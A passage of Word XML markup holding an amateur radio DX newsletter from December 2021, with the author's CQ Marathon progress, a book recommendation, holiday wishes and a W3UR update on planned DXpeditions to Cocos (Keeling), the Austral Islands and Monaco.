        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D74ECEB" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">This gives you a reason to work Canada, England, France, Spain etc. again in 2022! It is a clean slate and you can start all over to better your score from the previous year. I have been able to increase my score each year, even with sunspots declining. In 2017, as propagation started to fail, I had to get something up for 80M. In 2019, I added 160M to my set of tools. Now I have changed my 160M antenna from an inverted “L” to a Helically wound vertical. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">There is an excellent book that details one man’s chase to win the Marathon. That book, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>A Year of DX</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, by Bob, W9KNI, is an excellent read whether you will be chasing countries for the Marathon or not. He has some excellent tips on using Gray line, propagation, and breaking pileups. I have read it 3 times and learn something every time. (Great stocking stuffer)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t>If you are going to participate in the CQ Marathon, please let me know and let me know what your ongoing count is. I can publish here to add some spice to the challenge. As of 12/22, I am at 168 entities and 38 zones for a total of 206. Slightly ahead of last year, but if it were easy, it would not be worth doing!</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>I want to wish you Merry Christmas, Happy New Year and great DX in 2022. Please drop me a note from time to time to let me know that I am publishing what you want to read about. Also, if there are topics you would like me to include, let me know. I have some plans for 2022 and I will let you know in our next weekly issue what you can expect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B19C5B" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC8421D" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">CQDX </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CQDX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CQDX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CQDX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CQDX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CQDX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CQDX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CQDX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CQDX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="569D15AB" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="635537BB" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5747EF60" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is an update from Bernie, W3UR, of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>DailyDX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>WeeklyDX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, the best source for DX information. </w:t>
      </w:r>
      <w:hyperlink r:id="rId159" w:history="1">
        <w:r w:rsidRPr="00FC1FAE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www</w:t>
        </w:r>
        <w:r w:rsidRPr="00FC1FAE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>.dailydx.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Bernie has this to report:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB72C09" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77214044" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>VK9/C - Cocos (Keeling</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">) - A small team from Western Australia are planning a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DXPedition</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> to Cocos</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Island in the October/November 2022 time frame. This will include</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>VK6VY, VK6SJ, VK6CQ and at least one other to be announced. They will</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>be using the callsign VK9CM between October 26 and November 3, of next</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>year, including participation as VK9C in the CQ World Wide DX SSB</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Contest, October 29-30, 2022. While there they will be operating on</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">CW, SSB </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> FT8 on 1.8 through 28 MHz, and possibly 6 meters. QSL via</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>EB7DX. (Editor's note: VK9CM is a reissued call and has been used</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>previously by OH2YY, back in 2011.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AB593A" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="358AEEE5" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">FO/A - Austral Islands - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">During SP5EAQ's, Jacek's, trip to "suitcase type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DXPedition</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>," to</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Rimatara</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (OC-050) between March 2-30 he will be using special call</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TX5AQ in the CQ Worldwide WPX SSB Contest. He may actually use it "a</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>little before or after the competition". When not using the special</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>call he will be "using [his] CEPT call which is FO/SP5EAQ".</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">3A – Monaco - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Members of the Association of Radio Amateurs from Monaco (ARM) will be</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>commemorating the 100th anniversary of the passing of Prince Albert 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
